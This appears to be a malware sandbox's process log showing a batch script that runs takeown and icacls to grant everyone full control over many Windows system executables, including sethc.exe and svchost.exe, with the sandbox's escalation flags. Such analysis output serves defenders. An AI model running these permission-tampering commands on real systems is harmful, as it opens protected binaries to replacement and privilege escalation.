C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-services-svchost_31bf3856ad364e35_10.0.22000.1_none_1653a1993e779350\svchost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-services-svchost_31bf3856ad364e35_10.0.22000.1_none_1653a1993e779350\svchost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-services-svchost_31bf3856ad364e35_10.0.22000.1_none_1653a1993e779350\svchost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\EaseOfAccessDialog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\EaseOfAccessDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\EaseOfAccessDialog.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\sethc.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\sethc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sethc_31bf3856ad364e35_10.0.22000.1_none_c35886f1ae4523bc\sethc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\f\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\f\wowreg32.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\f\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\r\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\r\wowreg32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\r\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\wowreg32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.194_none_3a6786958001450b\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\r\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\r\wowreg32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\r\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\wowreg32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\wowreg32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\wowreg32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-setx_31bf3856ad364e35_10.0.22000.1_none_0d0f1dc7523a3859\setx.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-setx_31bf3856ad364e35_10.0.22000.1_none_0d0f1dc7523a3859\setx.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-setx_31bf3856ad364e35_10.0.22000.1_none_0d0f1dc7523a3859\setx.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.22000.1_none_6565a69e82761dd2\icsunattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.22000.1_none_6565a69e82761dd2\icsunattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.22000.1_none_6565a69e82761dd2\icsunattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.22000.1_none_a3d5ad1b3a087b4a\prevhost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.22000.1_none_a3d5ad1b3a087b4a\prevhost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.22000.1_none_a3d5ad1b3a087b4a\prevhost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-shutdown-event-tracker_31bf3856ad364e35_10.0.22000.1_none_636c5fa90121cd59\shutdown.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-shutdown-event-tracker_31bf3856ad364e35_10.0.22000.1_none_636c5fa90121cd59\shutdown.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-shutdown-event-tracker_31bf3856ad364e35_10.0.22000.1_none_636c5fa90121cd59\shutdown.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sort_31bf3856ad364e35_10.0.22000.1_none_0c566b4b52acbfd1\sort.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sort_31bf3856ad364e35_10.0.22000.1_none_0c566b4b52acbfd1\sort.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sort_31bf3856ad364e35_10.0.22000.1_none_0c566b4b52acbfd1\sort.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\f\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\f\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\f\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\r\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\r\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\r\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.282_none_78d41497d781352f\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\r\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\r\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\r\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\SpeechModelDownload.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\SpeechModelDownload.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\SpeechModelDownload.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-srdelayed_31bf3856ad364e35_10.0.22000.1_none_b6f59fcb95517038\srdelayed.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-srdelayed_31bf3856ad364e35_10.0.22000.1_none_b6f59fcb95517038\srdelayed.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-srdelayed_31bf3856ad364e35_10.0.22000.1_none_b6f59fcb95517038\srdelayed.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-synchost_31bf3856ad364e35_10.0.22000.1_none_ca19551135bc3c4e\SyncHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-synchost_31bf3856ad364e35_10.0.22000.1_none_ca19551135bc3c4e\SyncHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-synchost_31bf3856ad364e35_10.0.22000.1_none_ca19551135bc3c4e\SyncHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sysinfo_31bf3856ad364e35_10.0.22000.1_none_4fecf91331b8a2f0\systeminfo.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sysinfo_31bf3856ad364e35_10.0.22000.1_none_4fecf91331b8a2f0\systeminfo.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sysinfo_31bf3856ad364e35_10.0.22000.1_none_4fecf91331b8a2f0\systeminfo.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-systempropertiesremote_31bf3856ad364e35_10.0.22000.1_none_f56d8a8144f77003\SystemPropertiesRemote.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-systempropertiesremote_31bf3856ad364e35_10.0.22000.1_none_f56d8a8144f77003\SystemPropertiesRemote.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-systempropertiesremote_31bf3856ad364e35_10.0.22000.1_none_f56d8a8144f77003\SystemPropertiesRemote.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-systray_31bf3856ad364e35_10.0.22000.1_none_53e9c4cb2f33e8c8\systray.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-systray_31bf3856ad364e35_10.0.22000.1_none_53e9c4cb2f33e8c8\systray.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-systray_31bf3856ad364e35_10.0.22000.1_none_53e9c4cb2f33e8c8\systray.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..acyinkingcomponents_31bf3856ad364e35_10.0.22000.1_none_a28a13c3c2bf1e9c\pipanel.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..acyinkingcomponents_31bf3856ad364e35_10.0.22000.1_none_a28a13c3c2bf1e9c\pipanel.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..acyinkingcomponents_31bf3856ad364e35_10.0.22000.1_none_a28a13c3c2bf1e9c\pipanel.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.22000.1_none_fdc8d4cbc9bb5f92\ctfmon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.22000.1_none_fdc8d4cbc9bb5f92\ctfmon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.22000.1_none_fdc8d4cbc9bb5f92\ctfmon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\ttdinject.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\ttdinject.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\ttdinject.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\tttracer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\tttracer.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.22000.1_none_c4fc5204471c8488\tttracer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\change.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\change.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\change.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chglogon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chglogon.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chglogon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgport.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgport.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgport.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgusr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgusr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\chgusr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\logoff.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\logoff.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\logoff.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qappsrv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qappsrv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qappsrv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qprocess.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qprocess.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\qprocess.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\query.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\query.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\query.exe" /grant "everyone":(f)3⤵
-
-
-
